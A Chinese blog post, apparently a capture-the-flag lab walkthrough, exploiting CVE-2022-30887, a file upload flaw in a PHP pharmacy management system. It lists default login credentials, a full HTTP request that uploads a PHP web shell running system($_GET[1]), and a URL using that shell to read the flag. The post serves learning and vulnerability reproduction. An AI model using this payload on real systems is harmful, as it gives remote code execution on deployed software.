春秋云境:CVE-2022-30887

已于 2023-01-17 15:11:34 修改
阅读量3.8k 收藏 18
点赞数 2
分类专栏: 春秋云境-靶场 文章标签: 安全 安全漏洞 系统安全 cve 网络安全
于 2022-11-29 16:20:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laobanjiull/article/details/128100253
版权

春秋云境:CVE-2022-30887

文章合集春秋云境系列靶场记录(合集)

Pharmacy Management System文件上传漏洞:CVE-2022-30887

在这里插入图片描述

漏洞介绍

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

解题步骤

题外话:
做此题过程中前期没有任何思路,通过CSDN获取到一个POC,经过测试可以利用,最后重新收集了一下信息,终于找到了官方的POC,同时也找到另一个大哥给出的思路,拿到了登录的账号信息,信息都在下面有展示:

  1. 访问URL
    在这里插入图片描述

  2. 可以通过账号/密码登录:mayuri.infospace@gmail.com/mayurik,收集的信息在此处:https://www.yuque.com/jiryu/yz4rcd/tcug0q,同时感谢这位大哥的思路,文章地址:https://blog.csdn.net/weixin_44030810/article/details/127392107
    在这里插入图片描述
    在这里插入图片描述

  3. 登陆后就可以进行任意的文件上传,此处选择图中位置对文件进行上传并抓包,修改文件名和文件内容:
    在这里插入图片描述
    在这里插入图片描述

  4. 上传成功后查看图片地址并访问,此时要修改文件名为刚才上传修改后的文件名:
    在这里插入图片描述
    在这里插入图片描述

  5. 需要获取flag的话可以将刚才的phpinfo修改为其他shell命令

  1. 另一种做法是参考官方POC,官方POC信息在此处:
https://nvd.nist.gov/vuln/detail/CVE-2022-30887#match-7988813
https://packetstormsecurity.com/files/166786/Pharmacy-Management-System-1.0-Shell-Upload.html
  1. 构造数据包:
POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2ze7ntvll5ye8fxnoc64.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 479
Connection: close
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="test.php"
Content-Type: image/jpeg

<?php
	system($_GET[1]);
?>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

在这里插入图片描述

  1. 上传成功,官方POC也给出了图片路径,访问shell并获取flag:http://eci-2ze7ntvll5ye8fxnoc64.cloudeci1.ichunqiu.com/assets/myimages/test.php?1=cat%20/flag
    在这里插入图片描述

文章合集春秋云境系列靶场记录(合集)

Acczdy
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CVE-2020-10673:CVE-2020-10673
05-26
CVE-2020-10673 CVE-2020-10673:jackson-databind RCE
CVE-2022-30887春秋运镜漏洞复现
m0_51674437的博客
07-03 267
CVE-2022-30887漏洞复现
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
PHARMACY-MANAGEMENT-SYSTEM
03-22
PHARMACY-MANAGEMENT-SYSTEM
pharmacy-management-system:具有完整功能的药房管理系统
03-11
药房管理系统 具有完整功能的药房管理系统Dmoe网址: ://trustonepharmacy.somrat.info/
春秋云境CVE-2022-30887(文件上传漏洞)
m0_65712192的博客
04-14 2194
该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋云镜 CVE-2022-30887 多语言药房管理系统 (MPMS) [超详细新手教程]
starttv的博客
10-26 4499
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
CVE-2022-30887漏洞复现
weixin_45177807的博客
11-06 2188
CVE-2022-30887漏洞复现
春秋云境CVE-2022-30887
ZXW_NUDT的博客
02-22 2546
春秋云境CVE-2022-30887
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1544
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2013-6117:CVE-2013-6117
04-29
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
春秋云境靶场CVE-2022-30887漏洞复现(任意文件上传漏洞)
zyh1588的博客
11-21 743
小白复现CVE-2022-30887漏洞
春秋云镜 CVE-2022-30887
qq_22002773的博客
06-25 140
春秋云镜 CVE-2022-30887
CVE-2022-30887
龙狼刺的博客
06-06 198
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值